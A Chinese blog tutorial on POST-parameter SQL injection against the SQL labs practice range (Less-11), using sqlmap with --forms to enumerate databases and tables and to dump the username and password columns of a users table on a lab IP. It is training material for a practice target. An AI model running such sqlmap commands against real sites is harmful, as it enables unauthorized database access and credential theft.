SQL labs-SQL注入(四,sqlmap对于post传参方式的注入)

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

序言:本文主要讲解基于SQL labs靶场,sqlmap工具进行的post传参方式的SQL注入。

传参方式有两类,一类是直接在url栏内进行url编码后进行的传参,这种传参方式保密性不强,容易被修改;另一类则是url栏内部无显示,传参保密性较强。

一,抓包。(SQL labs-less11)

使用任意抓包软件进行抓包。

发现传参方式确实为POST形式。

二,sqlmap使用。

 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms

使用 sqlmap 的 --forms 参数自动搜索表单(在sqlmap使用过程中,会有很多选项,全部选择y确认)。

三,选择注入点。

此处说明有多个注入点,请选择一个进行注入,此处选择0。

失败了,重新编辑,加入--dbs参数。

sqlmap -u http://172.168.10.129:8001/Less-11/ --forms --dbs

成功。

四,得到表名。

 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' --tables 

五,得到字段名。

六,得到敏感信息。

sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' -T users -C passwrd,username --dump

但这里显示都是空的。

七,总结。

post与get传参并无明显差别,工具使用大同小异,手工post注入与get并无明显差别。下一篇文章将会讲解SQL注入-post手工注入。

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值